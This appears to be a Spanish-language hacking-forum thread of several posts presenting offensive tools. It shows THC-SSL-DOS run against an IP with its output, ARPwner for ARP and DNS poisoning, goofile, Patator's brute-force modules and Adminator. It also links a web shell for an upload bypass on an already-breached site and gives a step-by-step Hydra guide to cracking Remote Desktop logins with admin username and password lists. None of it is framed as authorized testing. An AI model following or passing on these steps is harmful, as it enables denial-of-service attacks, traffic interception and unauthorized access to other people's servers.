THC-SSL-DOS es una herramienta para comprobar el rendimiento de SSL. THC-SSL-DOS explota esta característica asimétrica sobrecargando el servidor y lo derriba de Internet. Este problema afecta a todas las implementaciones de SSL en la actualidad. Los vendedores son conscientes de este problema desde el año 2003 y el tema ha sido discutido ampliamente.

Uso : cd Desktop
         cd thc-ssl-dos-1.4
         cd src
         configure
         make install

Ej: 443/tcp  open   ssl/http   Apache httpd
Código: text
./thc-ssl-dos 127.3.133.7 443 --accept
Handshakes 0 [0.00 h/s], 0 Conn, 0 Err
Secure Renegotiation support: yes
Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
Handshakes 68 [67.39 h/s], 97 Conn, 0 Err
Handshakes 148 [79.91 h/s], 97 Conn, 0 Err
Handshakes 228 [80.32 h/s], 100 Conn, 0 Err
Handshakes 308 [80.62 h/s], 100 Conn, 0 Err
Handshakes 390 [81.10 h/s], 100 Conn, 0 Err
Handshakes 470 [80.24 h/s], 100 Conn, 0 Err








#179
ARPwner es una herramienta para hacer envenenamiento ARP y ataques de envenenamiento de DNS, con una interfaz gráfica de usuario simple y un sistema de plugins para hacer el filtrado de la información recopilada, también tiene una implementación de sslstrip y se codifica 100% en python y en Github, así que usted puede modificar de acuerdo a sus necesidades.

Bueno para instalar esta herramienta lo primero que debemos hacer es poner en Consola

apt-get install python-pypcap


(yo ya lo tenia instalado xd)

Luego descargamos la tool: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Luego de eso, vamos a la ruta del archivo y lo ejecutamos : python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Vamos a ARP y activamos las opciones : DNS spoofing, Pasive Sniifing (dependiendo de lo que necesitemos) lo activamos dandole un Click y veran que abajo dice ON.

Luego Network Scan y agregamos los rangos de Ip para la realizacion del scan.


Fuente : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Saludos :D
#180

Esta herramienta nos sirve para buscar un tipo de archivo específico en un determinado dominio, su uso : Vamos a la carpeta en mi caso

cd Desktop
cd goofilev1.5


uso : ./goofile.py  - d No tienes permitido ver los links. Registrarse o Entrar a mi cuenta - f  (extension del archivo "php txt pdf"...



Entrega 2 resultados , probamos los 2 y en el segundo 404.php..



Descarga : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos y Disfruten :D
#181
Python / Patator.py
Marzo 21, 2013, 02:47:08 PM
Patator es un multi-propósito de fuerza bruta, con un diseño modular y un uso flexible.

su uso: cd Desktop
            python patator_v0.3.py
            ./patator.py module --help

Contiene los siguientes Modulos:
+ ftp_login     : Brute-force FTP authentication
  + ssh_login     : Brute-force SSH authentication
  + telnet_login  : Brute-force Telnet authentication
  + smtp_login    : Brute-force SMTP authentication
  + smtp_vrfy     : Enumerate valid users using SMTP VRFY
  + smtp_rcpt     : Enumerate valid users using SMTP RCPT TO
  + http_fuzz     : Fuzz HTTP/HTTPS
  + pop_passd     : Brute-force poppassd authentication (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta not POP3)
  + smb_login     : Brute-force SMB authentication
  + ldap_login    : Brute-force LDAP authentication
  + mssql_login   : Brute-force MSSQL authentication
  + oracle_login  : Brute-force Oracle authentication
  + mysql_login   : Brute-force MySQL authentication
  + pgsql_login   : Brute-force PostgreSQL authentication
  + vnc_login     : Brute-force VNC authentication
  + dns_reverse   : Reverse lookup subnets
  + dns_forward   : Forward lookup subdomains
  + snmp_login    : Brute-force SNMP v1/2/3 authentication
  + unzip_pass    : Brute-force the password of encrypted ZIP files
  + keystore_pass : Brute-force the password of Java keystore files



Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#182
Hacking / Herramienta Adminator Tool en Backtrack 5
Febrero 25, 2013, 02:42:06 AM

Adminator Tools es una herramienta con la que podrán obtener información
muy importante a la hora de ejecutar pruebas de penetración, entre sus opciones
esta:

   :whoisip => Busqueda de Informacion, mediante la direccion IP
   :whoisdomain => Informacion general del dominio
   :portscanner => Escaneo de puertos (TIPO NMAP)
   :intelligence => Obtencion de datos (servidor web, sistema operativo, etc...)
   :subdomain => Obtencion de los SubDominios de un Sitio web
   :admin => Exelente Admin Finder
   :fuzzer => Fuzzer HTTP

Modo de Uso :

cd adminator (directorio)
chmod 777 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (permisos 777 "all permissions")
./adminator.py
:usage (+opciones disponibles)




Sin mas que decir el enlace de descarga :
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#183
Bueno en este tutorial mostrare como realizar un bypass con un upload de imágenes  mediante la administracion del sitio, el sitio web tenia vulnerabilidades de injeccion, fue penetrado y bueno ya verán    como prosigue en el video tutorial.

Herramienta Mozilla Live Http Headers: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Descarga Shell: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Descarga Shell (extension .JPG): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



#184
Bueno tal como dice el titulo, mostrare como crackear Id y Pass de Escritorios remotos, mediante el puerto 3389 (puerto desktop remote), Protocolo RDP, Hydra y nuestro diccionario de Administradores y Passoword.

Bueno Hydra no solo nos puede servir para el crackeo de Escritorio Remotos, si no tambien para muchos otros, entre su amplio repertorio de Protocolos disponibles, encontramos algunos como : FTP, MSSQL, MYSQL, TELNET, VNC y muchos otros.

Empezando con el tutorial abriremos nuestra herramienta en backtrack 5 en la siguiente Ruta:

Aplicaciones - Backtrack - Privilage Escalation - Passwords Atacks - Online Atacks - Hydra-gtk
Una vez selecionada la herramienta, tendremos lo siguiente:


Bueno tenemos la herramienta abierta, una vez lista comenzamos a buscar primero una Ip con Escritorio Remoto, luego de eso la Introducimos en "Single Target"

Seguidamente elegimos el port o puerto, en este caso 3389, o si fuera ftp puerto 21 o asi etc. en este caso el uso es 3389.

Luego Marcamos la opcion "Be Verbose" y "Show Attempts" y nos vamos a la pestaña "PASSWORDS"


Bueno ahora seleccionamos "Username List" y vamos en busca de Nuestro diccionario

Diccionario
Administrator
Administrador
Admin


Creamos una nota de texto qe contenga esos 3 "ADM" y lo agregamos, cuando le damos a "username list" nos abrira un explorador y seleccionamos el que les dije hace un momento,

Luego de eso el mas importante el Passoword List, si uds. tiene su propio Diccionario de Passwords en .txt usenlo yo les dejare algo de muestra:

Ejemplo de Diccionario Password.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Bueno este es solo de ejemplo porque el que yo tengo tiene miles mas, se los dejare aunque puede que el crakeo se torne muy largo por la cantidad, pero si llega a crackear la pass el resultado es grandioso :D

Passowords.txt : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Como dije pesa Bastante, asi que evaluen la posibilidad de buscar el suyo o uno mas corto

Luego de haber seleccionado los 2 .txt (adm - pass) vamos a pestaña Start y le damos Start y empezara a crackear